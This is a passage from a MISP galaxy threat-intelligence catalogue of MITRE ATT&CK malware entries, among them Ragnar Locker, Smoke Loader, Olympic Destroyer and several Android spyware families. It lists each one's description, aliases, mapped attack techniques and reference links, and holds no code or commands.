uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 4611. Table References
Links
https://attack.mitre.org/software/S0154
https://cobaltstrike.com/downloads/csmanual38.pdf

Ragnar Locker - S0481

[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)

The tag is: misp-galaxy:mitre-malware="Ragnar Locker - S0481"

Ragnar Locker - S0481 is also known as:

Ragnar Locker

View relationships graph

Ragnar Locker - S0481 has relationships with:

similar: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614" with estimative-language:likelihood-probability="almost-certain"

Table 4612. Table References
Links
https://attack.mitre.org/software/S0481
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/

SYNful Knock - S0519

[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim’s network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)

The tag is: misp-galaxy:mitre-malware="SYNful Knock - S0519"

SYNful Knock - S0519 is also known as:

SYNful Knock

View relationships graph

SYNful Knock - S0519 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004" with estimative-language:likelihood-probability="almost-certain"

Table 4613. Table References
Links
https://attack.mitre.org/software/S0519
https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-acis.html[https://www.fireeye.com/blog/threat-research/2015/09/synful_knock-_acis.html]
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

Power Loader - S0177

[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-malware="Power Loader - S0177"

Power Loader - S0177 is also known as:

Power Loader
Win32/Agent.UAW

View relationships graph

Power Loader - S0177 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011" with estimative-language:likelihood-probability="almost-certain"

Table 4614. Table References
Links
https://attack.mitre.org/software/S0177
https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Brave Prince - S0252

[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Brave Prince - S0252"

Brave Prince - S0252 is also known as:

Brave Prince

View relationships graph

Brave Prince - S0252 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4615. Table References
Links
https://attack.mitre.org/software/S0252
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Smoke Loader - S0226

[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware. [Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)

The tag is: misp-galaxy:mitre-malware="Smoke Loader - S0226"

Smoke Loader - S0226 is also known as:

Smoke Loader
Dofoil

View relationships graph

Smoke Loader - S0226 has relationships with:

similar: misp-galaxy:tool="Smoke Loader" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 4616. Table References
Links
https://attack.mitre.org/software/S0226
https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/
https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

Linux Rabbit - S0362

[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)

The tag is: misp-galaxy:mitre-malware="Linux Rabbit - S0362"

Linux Rabbit - S0362 is also known as:

Linux Rabbit

View relationships graph

Linux Rabbit - S0362 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 4617. Table References
Links
https://attack.mitre.org/software/S0362
https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Stealth Mango - S0328

[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Stealth Mango - S0328"

Stealth Mango - S0328 is also known as:

Stealth Mango

View relationships graph

Stealth Mango - S0328 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4618. Table References
Links
https://attack.mitre.org/software/S0328
https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

Corona Updates - S0425

[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)

The tag is: misp-galaxy:mitre-malware="Corona Updates - S0425"

Corona Updates - S0425 is also known as:

Corona Updates
Wabi Music
Concipit1248

View relationships graph

Corona Updates - S0425 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4619. Table References
Links
https://attack.mitre.org/software/S0425
https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/

Gold Dragon - S0249

[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Gold Dragon - S0249"

Gold Dragon - S0249 is also known as:

Gold Dragon

View relationships graph

Gold Dragon - S0249 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4620. Table References
Links
https://attack.mitre.org/software/S0249
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Caterpillar WebShell - S0572

[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-malware="Caterpillar WebShell - S0572"

Caterpillar WebShell - S0572 is also known as:

Caterpillar WebShell

View relationships graph

Caterpillar WebShell - S0572 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4621. Table References
Links
https://attack.mitre.org/software/S0572
https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

Cobian RAT - S0338

[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)

The tag is: misp-galaxy:mitre-malware="Cobian RAT - S0338"

Cobian RAT - S0338 is also known as:

Cobian RAT

View relationships graph

Cobian RAT - S0338 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4622. Table References
Links
https://attack.mitre.org/software/S0338
https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

Cardinal RAT - S0348

[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)

The tag is: misp-galaxy:mitre-malware="Cardinal RAT - S0348"

Cardinal RAT - S0348 is also known as:

Cardinal RAT

View relationships graph

Cardinal RAT - S0348 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 4623. Table References
Links
https://attack.mitre.org/software/S0348
https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

Golden Cup - S0535

[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup)

The tag is: misp-galaxy:mitre-malware="Golden Cup - S0535"

Golden Cup - S0535 is also known as:

Golden Cup

View relationships graph

Golden Cup - S0535 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

Table 4624. Table References
Links
https://attack.mitre.org/software/S0535
https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans

Olympic Destroyer - S0365

[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: misp-galaxy:mitre-malware="Olympic Destroyer - S0365"

Olympic Destroyer - S0365 is also known as:

Olympic Destroyer

View relationships graph

Olympic Destroyer - S0365 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
